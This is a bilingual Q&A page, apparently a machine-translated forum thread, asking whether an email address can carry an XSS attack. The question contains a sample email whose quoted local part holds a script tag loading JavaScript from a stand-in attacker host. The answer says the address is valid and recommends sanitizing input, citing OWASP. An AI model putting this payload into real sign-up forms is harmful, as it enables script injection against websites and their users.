通过电子邮件地址可以实现XSS攻击吗？ [英] Are XSS attacks possible through email addresses?

问题描述

我不知道是否可以使用电子邮件地址进行XSS攻击。

我们假设有一个网站可以注册并提供他的电子邮件地址。如果要攻击给定的网站，他或她可能会创建一个电子邮件地址，例如：

 <脚本src = // my.evil.site/is/attacking/u.js></script>\"@stmpname.com 
  

，然后使用此电子邮件地址来攻击网站。

电子邮件地址中是否允许引用或脚本标记？

解决方案

您的示例中的电子邮件地址显示为有效。 不寻常的唯一字符是报价 - 其他其他有效的。

维基百科建议您指定的电子邮件地址有效。

您需要确保任意用户输入在呈现之前进行清理。

首先，您可能需要参考有关 XSS 和预防，可从 OWASP 。

I wonder whether an email address can be used for XSS attacks.

Let's suppose there is a website where one can register and gives his email address. If one wants to attack the given website, he or she might create an email address, such as this one:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

and then use this email address to attack the website.

Is quote or script tag allowed in an email address?

解决方案

The email address in your example appears valid. The only character that is unusual is the quote " -- rest others are valid.

Wikipedia suggests that the email address you specified is valid.

You need to ensure that arbitrary user input is sanitized before being rendered.

To begin with, you might want to refer to information about XSS and prevention available at OWASP.

这篇关于通过电子邮件地址可以实现XSS攻击吗？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！